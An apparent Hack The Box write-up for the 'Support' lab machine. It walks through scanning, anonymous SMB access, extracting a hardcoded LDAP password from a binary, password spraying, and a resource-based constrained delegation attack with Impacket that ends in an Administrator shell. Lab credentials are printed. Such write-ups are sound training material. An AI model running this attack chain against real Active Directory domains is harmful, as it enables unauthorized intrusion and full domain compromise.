Support

Writeup Hack The Box Support

Port scanning

sudo nmap -sV -sT -sC -oA nmap_initial 10.10.11.174

Output:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:32 WIB
Nmap scan report for support.htb (10.10.11.174)
Host is up (0.023s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-17 14:32:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-07-17T14:32:52
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.55 seconds

Enumerate SMB

smbclient -L 10.10.11.174 --no-pass

And then, download all files from support-tools.

smbclient '//10.10.11.174/support-tools' -N -c 'prompt OFF;recurse ON;mget *'

Now, we will extract the password from UserInfo. There are two options to get the password: static analysis and dynamic analysis.

Dynamic Analysis

Try to run UserInfo.exe, before that, run tcpdump to check if there is any requests from the app.

sudo tcpdump -i tun0

mono UserInfo.exe find -first ''

Check at tcpdump.

After confirmed that the UserInfo send connection to the server, analyze the traffic with Wireshark.

Got credentials:

support\ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Static Analysis

Use AvaloniaILSpy do decompile the program.

We found the encrypted password and the key. Use python script to decrypt the key.

#! /usr/bin/env python3
import base64

def get_password():
    encoded_string = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
    key = b"armando"

    array = base64.b64decode(encoded_string)
    array2 = bytearray(array)

    for i in range(len(array)):
        array2[i] = (array[i] ^ key[i % len(key)] ^ 0xDF)

    return array2.decode("utf-8")
password = get_password()
print(password)

LDAP Enumeration

Enumerate all information using ldapsearch.

Query all username:

ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
-b 'DC=support,DC=htb' "(objectClass=person)" | \
grep "sAMAccountName:" | sed 's/sAMAccountName: //g'

Query all distinguished name.

ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support,DC=htb' "(objectClass=person)" | grep "dn:"

Enumerate all information at dn support.

ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=support,CN=Users,DC=support,DC=htb"

We found a credential at support info.

Found creds:

Ironside47pleasure40Watchful

Next, spray the password to other account.

crackmapexec winrm 10.10.11.174 -u users.txt -p 'Ironside47pleasure40Watchful' --continue-on-success

Get Low User

evil-winrm -i support.htb -u support -p Ironside47pleasure40Watchful

Privilege Escalation

After googling, i found useful article here:

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview
https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd

First, we need to add computer to domain with Impacket.

impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -computer-name 'ayanami' -computer-pass 'ayanami'

Then, import PowerView on target system.

Import-Module .\PowerView.ps1
Get-DomainComputer
Get-DomainComputer ayanami

Now, edit the target's "rbcd" attribute

impacket-rbcd -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'read' 'support.htb/support:Ironside47pleasure40Watchful'
impacket-rbcd -delegate-from 'ayanami$' -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'

Now, obtain a ticket (delegation operation)

impacket-getST -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.10.11.174 'support.htb/ayanami$:ayanami'

Get shell as Administrator.

KRB5CCNAME=administrator.ccache impacket-psexec -dc-ip 10.10.11.174 -no-pass -k support.htb/administrator@dc.support.htb

Tools Used

Tools used in this machine.

PreviousPhotobomb

Last updated 1 year ago